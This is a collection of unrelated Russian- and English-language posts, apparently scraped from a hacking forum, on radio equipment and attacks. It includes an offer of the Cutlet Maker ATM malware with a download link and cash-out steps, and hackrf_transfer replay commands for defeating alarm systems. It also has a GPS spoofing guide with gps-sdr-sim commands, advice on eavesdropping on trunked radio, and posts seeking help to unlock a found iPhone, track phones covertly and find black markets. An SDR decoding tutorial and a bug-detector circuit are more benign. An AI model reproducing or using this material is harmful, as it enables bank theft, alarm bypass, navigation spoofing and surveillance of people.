Если же конструкция не позволяет обойтись без гибкого соединения - предпочтение следует отдавать максимально коротким удлинителям, сделанными из толстого коаксиального кабеля, обладающего низкими потерями.

Профессиональные антенны и оборудование имеют другие разъемы, изготовленные таким образом чтобы уменьшить потери на высоких частотах, а так же увеличить передаваемую через разъем мощность. Это так называемые разъемы тип N, BNC и другие.

При возможности, лучше всего использовать разъемы стандарта N.
И, сами разъемы - покупать проверенных фирм. Качественный N разъем, хорошо работающий на частотах выше 2ГГц не может стоить дешевле 20-30$. Это, кстати - к вопросу стоимости антенн. Как может хорошая антенна на 5ГГц стоить 5$, если только один разъем стоит 30?

Поверхности и предметы окружающие антенну

Рядом с антенной, на расстоянии как минимум 3х длин волн не должно быть никаких металлических элементов, или других антенн.
Так, для частоты 900МГц — нужно убрать все лишнее как минимум на 1 метр от антенны. Предметы, находящиеся на меньшем расстоянии — оказывают сильное влияние на антенну и ухудшают ее параметры.
Конструкции типа как на фотографии (глушилка GSM), вызывают улыбку — ну не работают так антенны…

Антенны в таких конструкциях нужно хотя бы на пол-метра друг от друга отнести. Или использовать ОДНУ, широкополосную антенну.
Пример правильного решения:

На такой переносной станции радиоэлектронной борьбы (РЭБ), "глушилке" - установлена всего одна биконусная антенна, четко видно что с блоком усилителя она соединена ОДНИМ кабелем. т.е. все ее штырьки, это элементы одной антенны, а не 10 разных антенн.
Все элементы включены параллельно, но т.к. биконусные антенны широкополосны - глушилка может работать в довольно широком диапазоне частот.

Далее. Антенны, предназначенные для крепления на крышу автомобиля при помощи магнита — нельзя использовать без металлической поверхности под ними. Они изначально спроектированы таким образом, чтобы работать находясь на электропроводящей поверхности.

Т.е. если Вы купили автомобильную антенну с магнитом — и поставили ее на пластиковый подоконник, или деревянный стол - нормально работать она не будет.

Вот так делать - не правильно! Положите кусок железа размером 1х1м, и поместите антенну в центр этого листа.

Примеры хороших антенн.

• Перехват WiFi, «вардрайвинг»:

Однозначно — антенны Yagi, на тот диапазон который Вы перехватываете. 2.4 или 5ггц — разные антенны.
Панельные, «патч-антенны», не очень подходят, т. к. не имеют ярко выраженной поляризации.

• GSM перехват, Imsi-Catcher

Двойной квадрат, либо патч-антенна, либо более сложные конструкции.

• Глушилка, редиректор LTE

Нужна всего одна широкополосная антенна и сумматор перед ней.
Такие антенны довольно сложны в расчетах и еще более сложны в изготовлении и настройке, не всегда они эффективны.
Как вариант — можно заменить логопериодической антенной, либо использовать несколько узкополосных антенн, разнесенных в пространстве.

Выводы
Все антенны хороши, но каждая из них - рассчитана под определенную задачу. Не существует универсального, "идеального" решения, подходящего под любую цель.
Поэтому - прежде чем покупать антенну, следует определиться - в каких условиях ее планируется использовать, на каких частотах.

Пишите вопросы, задачи - буду рекомендовать те или иные варианты антенн. Только одна просьба - пишите тут, в тему - а не в личные сообщения. Поверьте, Ваш вопрос - скорее всего не уникален, и намного правильнее ответить на него один раз на форуме - сохранив эту информацию "следующим поколениям", чем 10 раз писать и то же в ЛС.

People want everything the easiest way, and tend to pay for something that will compromise them, putting them at risk. Because there is no method that can infect or access an ATm without being physically. Therefore, both the cutlet maker, Winpot and so many other existing malware are still active and working. Lack and courage or social engineering to be able to access the ATM safely. If you want to open the atm to be able to withdraw money, just the cutlet maker, identified only by Windows 10. Certainly all atm OSs run win7 or infeiror, which makes it clear that it works and will work for a long time. Until they update their OS to cost of billions. What I see and people selling another chicken's egg for mixing, which leads me to believe that only the seller wins and the risk is up to the buyer. with that in mind, I provide the cutlet maker with all the necessary applications, already with calcod, which authorizes the release of money. So if you dare to access an ATM physically, just inject a Hub, with a pendrive containing the cutlet maker and files, a wireless mouse, and one with a Windows XP iso, in case I need to reboot the system. Everything is contained within the available package.

Link download: https://drive.google.com/file/d/13sC...ew?usp=sharing
Password: infected

Писать про SIP не хочется, там писать практически нечего. МИТМ атака и перехват.Снял видео как и обещал.
Жмак

Другой обменник пароль 6j1619

Подмена «GPS» с помощью SDR. Подмена любых передатчиков.

​

«Радио – изобретение, наделавшее много шуму.»

​

Введение

​

Статья приурочена к апрельскому АВИАХАКАТОНУ. Данная информация не руководство к действию злоумышленника, а скорее руководство для безопасников и привлечение внимания к данной проблеме. Все эксперименты опасны для вашей свободы!
Врядли вы узнаете что-то новое из этой статьи и неоднократно уже слышали (в году так аж 2013) с момента выхода Defcon 21 и доклада с коротким названием - AllYourRFzAreBelongtoMe:HackingtheWirelessWorldwithSoftwareDefinedRadio от **Balint Seeber 'a.

[ https://www.defcon.org/images/defcon-21/dc-21-presentations/Seeber/DEFCON-21-Balint- Seeber-All-Your-RFz-Are-Belong-to-Me.pdf ](https://www.defcon.org/images/defcon-21/dc-21-presentations/Seeber/DEFCON-21-Balint- Seeber-All-Your-RFz-Are-Belong-to-Me.pdf)

**
Так что изменилось за шесть лет, спросите вы? А ровным счетом ничего… Кроме того, что SDR значительно подешевели и позволить себе игрушку может каждый школяр и если некоторые индивидуумы думают, что ограничение продажи устройств что-то решит в этой стране, очень жаль Вас, вы некомпетентны. Протоколы безопасности не обновляются или не существуют вообще (например, свободное общение сотрудников и передача персональных данных граждан по рации ретранслятора, который есть в каждом городе, наплевав на все ФЗ, которыми нас начали тыкать последнее время), багов и лазеек все больше и больше с каждым днем.

Просто подмена сигнала
​

Методика подмены сигнала (практически любого) строится на трех китах и проста до безобразия. База , которая будет подменяться, глушилка (необходимо знать ТТХ твоего устройства перед применением и подбирать необходимый радиус), устройство для копирования и вещания сигнала, в нашем случаеSDR. Рассмотрим одну простейшую ситуацию, а область применения широка, от диверсий и дезинформаций до взлома пультов охранных предприятий.

Пример - сигнализация типового объекта:

Code:Copy to clipboard

1) Изучаем спектр частот и находим нужный нам сигнал. Софт - SDRSharp, Gqrx, Gnu-Radio

2) Записываем кусок сигнала: hackrf_transfer  -r NAME_FILE -f 473000000 -b 1750000 -s 16000000 -a 1

3) Воспроизводим сигнал: hackrf_transfer  -t NAME_FILE -f 473000000 -b 1750000 -s 16000000 –a 1

Ключом -f задается частота в герцах, в этих же единицах указываются ширина записываемой полосы (-b) и частота дискретизации сигнала (-s). Ключ -a _отвечает за использование встроенного усилителя. Ну, а про rx / tx вы уже должны знать к этому моменту.

_

Да, друг мой, все настолько просто. Сигнализация хоть и сработает, но об этом узнают слишком поздно.
Конечно же продуман скажет «Сейчас все на Симках и GSM протоколе, проводах бла бла бла» да, но это не панацея, такие сигнализации банально «залинкованы» с пультом управления и при глушении начинают «визжать» сначала по интернету, а если он не доступен СЛАТЬ СМС! О перехвате СМС и трафика есть информация в первой части но вы определенно столкнетесь с внутренней алгоритмизацией таких сообщений даже прорвавшись через протокол связи и придется подумать (как правило отправка в течении 1-1.5 минуты на пульт).

Или упрощенная методика без глушилки – наш сигнал (помеха) должен быть сильнее источника , но это дополнительные риски :smile81:

GPS
​

Сейчас приемник спутниковой навигации есть не только в телефоне, но и — в промышленных установках, в датчиках телеметрии, в банкоматах. Такие приемники обеспечивают навигацию в автоматически управляемых системах, от городского транспорта до военных дронов. Системы глобального позиционирования проникли в нашу жизнь и большинство людей не задумываются насколько им можно доверять.

Почему АВИАХАКАТОН? Маленький стеб. На борту самолета находится более 7 датчиков и прогноз неутешителен… от банального перенаправления судна. Общение идет так же по открытым каналам.

Гражданские квадрокоптеры имеют программе запрещенные координаты, над которыми им нельзя летать, — например, аэропортов. Используя «навигационное оружие», можно убедить квадрокоптер, что он оказался во Внуково, в результате чего он не сможет лететь дальше и сядет. Предполагается, что именно такой защитой от дронов объясняются сбои GPS вокруг Кремля. А можно и посадить в удобном месте :smile23:

Большую опасность представляет подделка сигнала спутников, в случае промышленных систем синхронизации — в энергетике или в добывающей промышленности. Для подсчета электроэнергии или для выбора схем энергоснабжения на различных участках используется синхронизация времени по данным той же системы GPS. Обман такой системы всего на несколько секунд приведет к тому, что система недосчитает мегаватты электроэнергии.

Есть яркий пример – история о немецких станках. Они были привязаны к заводу по координатам и их вынесли спокойно куда было нужно. Яхту за 80 миллионов _$_направили в другое место :smile45:

Самые простые варианты -используют в угонах , дабы датчик не глушить и навести погоню на ложный след. Слышал про туристов… Поворот не туда смотрели фильм? :eek:

Реализация.

Не забудьте про наличие TCXO на вашей RF-плате :smile12:
Предварительно установить необходимый набор стандартного софта (HackRF, Lime, USRP)
blog.goo.ne.jp/osqzss - учим Японский )


u-center

GNSS evaluation software for Windows

 www.u-blox.com

Линь , тут и информация по запуску и генерации файла с координатами - https://github.com/osqzss/gps-sdr-sim
https://www.labsat.co.uk/index.php/en/free-gps-nmea-simulator-software

Вы можете создать путь с помощью Google Планета Земля и сохранить путь вKML (язык разметки а-ля XML) Используя эту программу SatGen , вы можете загрузить KML, и он покажет вам некоторые опции, которыми вы можете манипулировать, а также приблизительную картину вашего пути. Подсовывать динамичные данные спутника следует в CSV файле, которые вы конвертируете из KML.

Code:Copy to clipboard

./nmea2um output_nmea_file user_motion.csv

Вынь , Инсталятор Gnu-Radio под - http://www.gcndevelopment.com/gnuradio/downloads.htm

Запустите Visual Studio.
Создайте пустой проект для консольного приложения.
Добавьте «gpssim.c» и «getopt.c» в папку «Souce Files».
Выберите «Release» в раскрывающемся списке « Configurations».
Build.

Сгенерировать статичный сигнал на тест таким образом:

gps-sdr-sim.exe -e brdc3540.14n -s 2500000 -l 30.296403,120.0526889,100 -b 8 -d 300 -v -o 123.bin

• gps-sdr-sim.exe — это файл, который вы собрали студией.
• brdc3540.14n — это файл с эфемеридами спутников.
• 2500000 — это частота дискретизации
• 30.296403, 120.0526889— координаты
• 100 — высота
• 8 — это разрядность чисел в выходном файле (один отсчет — это IQ, два числа).
• 300 — это длительность в секундах.
• -v — это чтобы побольше писало в лог
• 123.bin — имя выходного файла.

Для общего развития:
http://webarchiv.ethz.ch/geometh-data/downloads/GPSBasics_en.pdf

Заключение
​

Методика обнаружения – это доплеровский радар. Система должна детектить сдвиг сигнала не только по мощности, но и положению передатчика, что даст некое подобие защиты (совместно). Добавить больше нечего…

…кроме
[https://www.darkreading.com/iot/gps-spoof-hits-geneva-motor- show/d/d-id/1334147](https://www.darkreading.com/iot/gps-spoof-hits-geneva- motor-show/d/d-id/1334147?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple)

:smile60:

Где я могу найти этот вирус? Where can i find this Virus? {Exploit | CVE}

кто учит меня удалять учетную запись icloud с телефонов iphone

Ситуация такая нашел телефон! Там пароль стоит! заряжает через юсб все нормально а вот к компу не подрубает кто знает как обновить и продать данный телефон?)
Вернее снести ) А продам я сам)))

Лови сигнал! Используем SDR, чтобы перехватить и расшифровать сигнал пульта

Автор: @DmitrySpb79

Если при слове «радио» тебе вспоминается только старый дедушкин «Грюндиг» или «Океан», то это очень узкий взгляд на вещи. Мы живем во время беспроводных устройств, интернета вещей, 5G и прочих интересных штук. Все больше информации передается «по воздуху», поэтому хороший специалист должен разбираться в радиопротоколах. Я расскажу, как принимать сигнал, где его искать и как анализировать.

Что передается по радио
Для начала нужно понять, что и где можно найти в радиоэфире. Список обширный: от изображений с метеоспутников до команд для атомных подводных лодок.

Купить широкополосный радиоприемник USB можно на eBay всего лишь за 30 долларов с бесплатной почтовой доставкой. Ищи по словам RTL SDR V3. Он позволяет принимать и записывать практически любые радиосигналы в диапазоне от 24 до 1700 МГц, и этого более чем достаточно для большинства экспериментов.

Еще в Первую мировую войну было известно, что переданные радиосигналы могут быть приняты кем угодно. Так что все действительно важное передается зашифрованным, и не стоит надеяться включить радио и узнать секреты Пентагона. Но кое-что интересное найти все же можно.

Пройдемся по частотам.

• Сверхнизкие частоты до 30 кГц: связь с подводными лодками. Радиоволны такой низкой частоты способны проникать даже в глубину океана, что, разумеется, используется военными. Система «Зевс» работает на частоте 82 Гц, аналогичная американская система Seafarer — на частоте 76 Гц. Длина волны такой передачи сопоставима с радиусом Земли, а КПД антенны составляет тысячные доли процента. В нее нужно подать чуть ли не мегаватт, чтобы на выходе получить один ватт. Чуть выше по частоте, примерно на 14 кГц можно найти сигналы навигационной системы «Альфа». Принять эти сигналы может каждый, если поставить антенну на крышу или отъехать подальше от города, где нет помех. На YouTube можно найти видео энтузиастов.
• На частоте 77 кГц передаются сигналы точного времени из Германии. Система DCF77, наиболее популярная в Европе, позволяет синхронизироваться настольным и даже некоторым наручным часам. Если на часах есть логотип Atomic Clock или Radio Controller, они могут принимать такой сигнал.
• Длинные волны — 400 кГц — заняты сигналами так называемых ПРМ — приводных радиомаяков (в английской литературе NDB — non directional beacon). В каждом самолете есть радиокомпас, который показывает направление на выбранный аэропорт.
• На средних и коротких волнах (от 2 до 20 МГц) передаются метеопрогнозы для судов и метеофаксы, телеметрия разных устройств; работают военные модемы STANAG, загоризонтные радары и многое другое. Многое из этого можно принять на хороший коротковолновый приемник.
• На так называемом диапазоне Си-Би (Citizen Band) 27 МГц работают таксисты и дальнобойщики.
• На частотах от 30 до 40 МГц раньше работали домашние радиотелефоны, сейчас их уже практически не осталось. Большая трубка с длинной антенной из старых фильмов — это оно. Владельцы обычно и не подозревали, что любой желающий может слышать их разговор, никакого шифрования в этих телефонах не было.
• На частотах от 88 до 108 МГц звучит всем известное FM-радио. Радиоинженеры называют его WFM (Wide FM, в отличие от узкополосной FM портативных радиостанций). Чуть ниже передавался так называемый советский УКВ, сейчас эти станции тоже практически везде закрыты.
• На частотах от 118 до 137 МГц работают авиаторы. Переговоры летчиков с диспетчерами и между самолетами, например на воздушном параде, передаются в открытом и незашифрованном виде.
• На частоте 137 МГц работают метеоспутники NOAA. Ты можешь принять их сигнал и декодировать картинку вида Земли из космоса, только нужно знать время, когда спутник пролетает над твоей головой. Энтузиасты и тут преуспели и выложили это на YouTube.
• На частотах в диапазоне 140–200 МГц и 400–500 МГц — разные службы и сервисы: ГИБДД, пожарные, скорая, лифтеры, гастарбайтеры. Диапазон 433 МГц выделен для портативных радиостанций, которые ты, возможно, видел в продаже. Рядом по частоте работают и портативные радиоустройства, к которым мы еще вернемся.
• Раньше на частоте 165 МГц работали пейджеры — устройства для приема текстовых сообщений, и все их сообщения для абонентов передавались в открытом виде, доступном для декодирования. Сейчас в России пейджеров вроде бы не осталось, а в Европе и США они живы до сих пор, ими пользуются пожарные, медики и прочие службы.
• На частоте 255 МГц работают американские спутники связи SATCOM. Интересны они тем, что спутники старые и аналоговые и общаться через них, в принципе, может любой желающий, никаких паролей и аутентификации. Чем до сих пор пользуются некоторые бразильские и мексиканские фермеры, которые приспособили такие спутники вместо халявного радиотелефона. Нужна лишь радиостанция на этот диапазон и направленная антенна. Сделать это может каждый, но на территории России сигнал слабый.
• На частотах 865 МГц и 2,4 ГГц находится диапазон ISM (Industrial, Scientific, Medical). Там работают радиомодемы, устройства IoT и разные девайсы. Если ты хочешь передавать данные со своей Arduino без проводов — бери модуль на этот диапазон.
• На частотах 900 и 1800 МГц работает сотовая связь.
• На частоте 1090 МГц работает ADS-B — транспондеры самолетов, благодаря которым ты можешь видеть пролетающие самолеты на сайте Flighradar24. И эти сигналы тоже можно принимать и декодировать самостоятельно.
• На частоте 1575 МГц передаются сигналы GPS, благодаря которым работает навигация в твоем смартфоне или автомобиле.
• Еще выше по частоте (10 ГГц и более) работают спутники, радиорелейные линии связи.

Экскурс вышел не очень кратким, но это было необходимо. Теперь пора поговорить о том, что нам нужно, чтобы радиосигналы принимать и передавать.

Железо
В радиотехнике, как и во многих жизненных областях, все зависит от бюджета. Примерно за 30 долларов можно купить приемник RTL SDR V3, позволяющий принимать радиосигналы в диапазоне от 24 до 1700 МГц.

RTL SDR

В комплект входит антенна и мини-штатив. Остерегайся подделок и не бери совсем дешевые модели с AliExpress за десять баксов. Да, китайцы научились уже подделывать сами себя.

С этим приемником можно принимать сигналы авиадиапазона, FM-радио, портативных радиостанций, ADS-B, некоторых модемов. Но вот передавать RTL SDR не может.

Если ты хочешь не только принимать радиосигналы, но и передавать их, тогда хороший выбор — это LimeSDR или LimeSDR Mini. Первый более функциональный и дорогой, второй дешевле. Примерно за 200 или 400 долларов ты получаешь устройство, способное и принимать, и передавать в диапазоне от 10 МГц до 3,8 ГГц.

LimeSDR Mini

Устройство продается через краудфандинговый сайт crowdsupply и не всегда есть в наличии, так что лови момент. Кстати, этих LimeSDR авторы продали на два миллиона долларов. Хорошие знания в электронике могут сделать тебя не только умным, но и богатым!

Отдельно хочу сказать о HackRF One. Этот девайс позволяет передавать и принимать на частотах от 1 МГц до 6 ГГц.

HackRF

Устройство, в принципе, неплохое, но морально устарело, имеет лишь восьмибитный ЦАП и АЦП и не может одновременно принимать и передавать, а это иногда важно. Поэтому, несмотря на хакерское название, брать его я не рекомендую — за те же 300–400 долларов можно взять более современный девайс. Попадаются и дешевые китайские клоны, но их я не тестировал и ничего сказать не могу.

Есть и другие устройства (USRP, BladeRF, Airspy), но описанных выше для наших задач достаточно. Так что делай заказ в интернет-магазине на то, что больше понравилось, а пока посылка идет почтой, можешь потратить время на теорию.

Софт
В этой части мы поговорим о приеме радиосигналов и их декодировании. Для примера возьмем что-нибудь попроще и подешевле, что есть дома у многих, — беспроводной выключатель.

Беспроводной выключатель на 433 МГц

Он хорош тем, что его сигнал простой и понятный, для его анализа достаточно даже редактора Paint. Нам понадобится только приемник (будет достаточно RTL- SDR) и бесплатная программа SDR#.

Виды модуляции
Для начала разберемся, как вообще сигналы передаются по радио. Здесь есть несколько возможных вариантов.

Амплитудная модуляция (АМ — Amplitude Modulation). Здесь амплитуда передатчика модулируется нужным нам сигналом. Это как раз то, что ты изучал в школе на физике в разделе «детекторный приемник». Плюс схемы — в ее простоте, и в простых устройствах она до сих пор активно используется. На спектре ее легко отличить по характерному виду — по симметрии относительно центра.

Частотная модуляция (FM — Frequency Modulation). Здесь модулируется не амплитуда, а частота. Используется в портативных радиостанциях, радионянях и во всем им подобном.

Фазовая модуляция, QAM, OFDM — используется в модемах, цифровых видах связи для передачи голоса или данных. Если ты видишь на спектре широкий сигнал, это оно.

В нашем случае все просто. Дешевые китайские пульты используют амплитудную модуляцию в ее самом простейшем цифровом формате, называемом OOK — On-Off Keying.

Запись
Для начала внимательно смотрим на пульт. В моем случае на задней стороне пульта было написано Made in China и Frequency 433.92MHz. Это облегчает нам задачу. Хотя даже если бы это не было написано, частоту легко найти — ширина полосы RTL-SDR составляет 2 МГц, и такие сигналы на экране SDR# хорошо видно.

В моем случае реальная частота оказалась 434 МГц — видимо, ±100 кГц для китайской техники не погрешность. Сам сигнал должен быть хорошо виден, если поднести пульт к антенне и нажать кнопку.

Сигнал в SDR#

Осталось его записать. Запускаем SDR#, настраиваемся на частоту, выбираем модуляцию AM, включаем запись, подносим пульт к антенне приемника и нажимаем на нем подряд все кнопки. На выходе мы должны получить файл WAV, который мы и будем анализировать.

Анализ
Формат On-Off Keying — очень простой бинарный формат, и никаких серьезных инструментов для работы с ним нам не потребуется. Просто открываем файл в любом аудиоредакторе, я использовал Cool Edit.

SDR# почему-то пишет WAV в формате стерео, хотя АМ не может быть стерео. В том же Cool Edit я сконвертировал «звук» в моно.

Если все было сделано правильно, мы увидим подобную картинку

Можно обойтись и без Cool Edit, если у тебя его нет или если ты принципиально против использования взломанного ПО. Вывести файл WAV можно с помощью Python и библиотек для научной обработки и визуализации данных NumPy, SciPy и Matplotlib.

Чтобы код заработал, нужно установить Python 3 или 2.7 и библиотеки Matplotlib, NumPy и SciPy, а после ввести следующую команду:

• в Windows:

Code:Copy to clipboard

> C:\Python3\Scripts\pip.exe install numpy scipy matplotlib

• в Linux:

Code:Copy to clipboard

$ sudo pip install numpy scipy matplotlib

Код самой программы:

Code:Copy to clipboard

import scipy.io.wavfile
import numpy as np
import matplotlib.pyplot as plt

rate, data = scipy.io.wavfile.read('recording.wav')
data_left = data[:, -1]

plt.figure(1)
time = np.linspace(0, len(data_left)/rate, num=len(data_left))
plt.plot(time, data_left)
plt.tight_layout()
plt.show()

Запустив программу в консоли, увидим такую картинку.

Запись в Matplotlib

Идем дальше и пытаемся понять, что же тут изображено. На моем пульте десять кнопок, десять больших блоков — это мои десять нажатий. Увеличиваем первый блок и видим, что он состоит из одинаковых фрагментов, которые повторяются каждые 0,08 с. Все просто: 0,08 с — это длительность одной посылки, и, пока ты держишь кнопку нажатой, она циклически повторяется.

Повторяющаяся последовательность

Теперь увеличиваем блок еще больше и смотрим на каждую последовательность. В качестве примера возьмем части из последовательностей для первой и второй кнопок и выведем их рядом с помощью Paint.


Это самый обычный двоичный код. Пик — это единица, его отсутствие — ноль. Хорошо видно, что две кнопки отличаются двумя битами. Таким образом, пульт просто посылает длинную двоичную последовательность, соответствующую нажатой кнопке. Можно убедиться в этом, нажимая остальные кнопки и наблюдая другие последовательности.

Длина последовательности обусловлена многообразием и количеством устройств. Последовательность сделана такой длинной, чтобы вероятность совпадения кодов была небольшой.

По этому принципу работает множество девайсов — беспроводные пульты, метеостанции, датчики давления в шинах. Дешево и сердито, устройство практически не требует питания, такой датчик в метеостанции, например, может работать год от двух батареек. Но минус тут тоже очевиден — полное отсутствие какой-либо защиты, все передается в открытом виде. Зачастую это не критично, но такой пульт на дверь гаража я бы все же вешать не стал.

Используя дешевые беспроводные пульты, знай, что их данные представляют собой простой двоичный код и никак не защищены ни от прослушивания, ни от передачи. Если безопасность критична, используй более дорогие устройства, например на базе Z-Wave или Philips Hue.

Тебе наверняка было бы лень считать биты на картинке, чтобы узнать, какая кнопка была нажата. И ты не одинок — умные люди уже написали программу анализа сигналов на частоте 433 МГц для приемника RTL-SDR, которая так и называется — rtl_433. Ты можешь скачать ее на GitHub или найти в интернете в формате .exe. В эту программу заложена большая база разных устройств, так что, запустив ее, ты увидишь все в понятном виде.

Запускаем программу из командной строки командой rtl_433.exe -G и получаем значения всех датчиков, которые доступны поблизости.

Вывод программы rtl_433

Так я узнал температуру и влажность воздуха от некоего Nexus, скорость и направление ветра от Wind Sensor. Список датчиков, которые поддерживаются программой, большой, программа кросс-платформенная и может работать на Windows, OS X, Linux и даже на Raspberry Pi.

Если идея передачи данных без проводов тебе понравилась, ты можешь купить недорогой радиомодуль для Arduino на eBay или AliExpress. Найти его несложно — ищи по словам Arduino 433MHz, цена такого модуля примерно один доллар за штуку.

Когда будешь использовать такой модем, помни: время передачи не должно превышать 1% от общего времени (так называемый параметр duty cycle. Частота одна для всех, и нужно дать время другим устройствам передать свои данные.

Сегодня мы научились только принимать и анализировать радиосигнал. О том, как передавать данные и управлять устройствами при помощи передатчика SDR, я расскажу в другой раз. Надеюсь, я заставил тебя по-новому посмотреть на радио!

хакер.ру

Сабж.
Буду благодарен, если подскажете даркнет/клирнет маркеты или форумы по продаже и обсуждению различной черной/серой техники, "шпионской" и различной запрещенной/полузапрещенной электроники.

интересует следующий вопрос , реально ли если на мобилу установить какой-либо софт , определять примерное местоположение тела ? мобильник без gps...
не так важно максимально точное определение , а чтобы как-то определить в каком городе находиться она то есть главное чтобы можно было определить в каком именно городе находиться тело

Уменя есть обогреватель неизвесного происхождения и непонятной формы,зато новый подскажите на него можно какойнибудь регулятор поставить?а то жгёт неподетски

Простите за копипаст, но, имхо, интересно =)

В последние годы подслушивание разговоров с помощью радиомикрофонов получило, увы, заметное распространение как в бизнесе, так и в быту. На радиорынках сегодня можно без труда приобрести различные "жучки", "баги" и т. п. различной степени сложности. Обнаружить их можно с помощью приемников (сканеров), "просматривающих" электромагнитное излучение в широкой полосе частот - от килогерц до гигагерц. Такие приемники обычно весьма дорогие. Но на определенном уровне эту проблему удается решить и с помощью более простых устройств - сигнализаторов и индикаторов наличия высокочастотного поля. Об одном из вариантов такого прибора и рассказывает публикуемая здесь статья.

Прибор для поиска микропередатчиков представляет собой звуковой и световой сигнализатор наличия радиочастотных излучений. Он имеет высокую чувствительность в полосе частот до 1 ГГц. Например, "жучок" с излучаемой мощностью 1,5 мВт (выходной каскад на одном маломощном транзисторе) можно обнаружить с расстояния около 10 см. Точную зависимость чувствительности сигнализатора от частоты автору определить не удалось из-за отсутствия необходимой для этого аппаратуры. Конструкция прибора проста и доступна для повторения даже радиолюбителям с небольшим опытом изготовления электронных устройств. В нем использованы доступные компоненты.

При этом потребительские свойства этого сигнализатора весьма неплохие. Он имеет малые размеры и массу, что позволяет его постоянно носить в кармане. Прибор прост в эксплуатации: единственный орган управления - выключатель питания.

Принципиальная схема сигнализатора показана на рис. 1. При приближении антенны WA1 к микропередатчику в ней наводится высокочастотное напряжение, которое через конденсатор С1 поступает на вход УРЧ (транзистор VT1). Емкость конденсатора С1 определяет нижнюю границу принимаемого диапазона частот. Ее подбирают такой, чтобы индикатор не реагировал на бытовые низкочастотные помехи от электродвигателей, тиристорных регуляторов напряжения, ГСП магнитофонов и т. п.

С выхода УРЧ сигнал поступает на диодный детектор VD1. Через фильтр C4L1 и резистор R6 постоянная составляющая продетектированного сигнала поступает на вход усилителя постоянного тока (транзисторы VT2, VT3). Резистор R6 несколько снижает чувствительность индикатора, но он необходим для того, чтобы избежать резкого повышения чувствительности прибора на частоте резонанса контура C4L1 (около 50 кГц). Усилитель постоянного тока управляет работой мультивибратора на транзисторах VT4 и VT5.

К коллекторным цепям транзисторов VT4, VT5 подключен пьезоизлуча-тель ZQ1, который преобразует электрические колебания, вырабатываемые мультивибратором, в звук. Такое включение излучателя повышает громкость его звучания. При работе мультивибратора, кроме того, светится и свето-диод HL1.

Чем больше сигнал от "жучка", тем больше ток через транзистор VT3 и тем выше частота звукового сигнала и его громкость, а также интенсивность свечения светодиода HL1. Перемещая сигнализатор, ищут его положение, при котором максимальны громкость сигнала и яркость светодиода. Затем в "ближней зоне" проводят визуальный поиск местонахождения подслушивающего устройства.

На диод VD1 через резистор R4 поступает напряжение смещения со стабилизатора напряжения R5, VD6, которое приоткрывает диод VD1 и транзистор VT2. Это повышает чувствительность детектора к малым уровням ВЧ сигналов. Резистор R4 подбирают так, чтобы светозвуковой сигнализатор находился на грани срабатывания сигнализатора. Как следствие, даже очень небольшая добавка напряжения, возникающая при детектировании исследуемого сигнала, открывает транзисторы VT2, VT3,запуская мультивибратор.

Недостаток такого решения - заметная термочувствительность сигнализатора. Ее можно устранить, подобрав R4 так, чтобы сигнализатор не срабатывал самопроизвольно в выбранном диапазоне температуры. Облегчит эту процедуру применение в качестве VT2 транзистора с очень малым обратным током.

Диод VD1 можно заменить на КД503Б, КД509А, КД512А, КД407А или КД409А. Стабилитрон VD3 - любой с напряжением стабилизации 5...7 В. Транзистор VT1 - КТ368 с любым буквенным индексом в любом корпусе либо другой высокочастотный, например, КТ3101А-2, КТ3120А, КТ3124. Транзистор VT2 - КТ3102 с индексами Г, Е. Заменять его на другие не стоит, так как он имеет очень малый начальный ток коллектор-эмиттер - менее 0,05 мкА. Транзистор VT3 можно заменить на КТ3107 с индексами К, Д. Вместо транзисторов VT4 и VT5 допускается использовать любые кремниевые маломощные соответствующей структуры с подходящей цоколевкой. Лишь бы обратный ток коллектора был достаточно мал, чтобы мультивибратор не самовозбуждался. По этой причине нельзя применять германиевые транзисторы. Чем больше коэффициент передачи тока каждого транзистора, тем выше чувствительность всего устройства.

Автор использовал пьезоизлучатель ZQ1 от электронных часов "Монтана", но здесь подойдут и другие. Дроссель L1 должен иметь индуктивность 1...2 мГн. В авторском варианте он содержит 180 витков провода ПЭЛШО-0,12 на кольце от импульсного трансформатора ТИ-18. Выключатель SA1 - ПД9-2. Антенна WA1 - телескопическая от импортной магнитолы общей длиной 32 см. Слишком длинную антенну использовать не следует.

Налаживание сигнализатора начинают с установки напряжения смещения на диоде VD1. Для этого конденсатор СЗ нужно временно отключить. Вместо резистора R4 временно устанавливают переменный сопротивлением 560 кОм. Вращая его движок, добиваются исчезновения звука. Если теперь поднести устройство к лампе на- каливания или вынести на солнечный свет, то сигнализатор начнет слабо пищать, набирая громкость с нагревом. Затем измеряют сопротивление переменного резистора и устанавливают резистор R4 с сопротивлением, в полтора раза большим. Это обеспечит работоспособность сигнализатора радиоизлучения в приемлемом диапазоне температуры. Усиление УРЧ регулируют подбором резистора R2.

Корпус прибора - коробка для слайдов. Расположение элементов в корпусе показано на рис. 2. В торце коробки делают отверстие по диаметру самого толстого звена телескопической антенны. На это звено натягивают отрезок резиновой трубки, размоченной в толуоле. Длина трубки должна немного превышать длину коробки. После испарения толуола резиновая трубка плотно приклеится к антенне. Резиновую трубку обрезают так, чтобы при установке антенны в корпус она, сжавшись, плотно удерживала антенну. Плату вставляют под резиновую трубку.

На корпусе снаружи укрепляют полоску медной фольги и соединяют ее с общим проводом. На начальном этапе поиска "жучка" следует касаться фольги большим пальцем руки. В этом случае ваше тело играет роль противовеса, что повышает чувствительность прибора. При "ближнем" поиске можно палец от фольги убрать. Это понизит чувствительность прибора и повысит точность определения местонахождения "жучка".

(с) В. ЧИСТОВ, г. Горячий Ключ Краснодарского края

вот нашел как переделовать джостики http://mastermods.modding.ru/joypad.htm посмотрите а потом судите если сделаете и там драиверы есть!!! на сылке

здравствуйте уважаемые форумчане.. я тут новенький.. так что сразу просьба не воспринимать в штыки..) у меня такой вопрос.. как собрать аппарат на энное количество симок, с одним передатчиком и приемником, и чтобы симки регистрировались в сети поочередно на определенное время.. опишите пожаласта процесс, если таковой возможен.. заранее спасибо!

Для этого не нужно специальное программное обеспечение, ни транковой платы... Только радиостанция на соответствующий диапазон, имеющая возможность работы через репитеры и диктофон, желательно цифровой, а лучше всего компьютер. . Самое главное здесь - это знать телефонные номера столбов (вышек), к которым подключены транковые контроллеры. Узнать их - дело фантазии и возможностей взломщика: или завести знакомство с кем-нибудь из работников фирмы, использующей транк, или врубаться в разговоры и "довести" кого-нибудь, а потом дать ему номер своего мобильного, чтобы он перезвонил на него с рации и высказал все что думает... Этого будет достаточно, номер столба покажет АОН мобильника, а номер можно потом и закрыть.

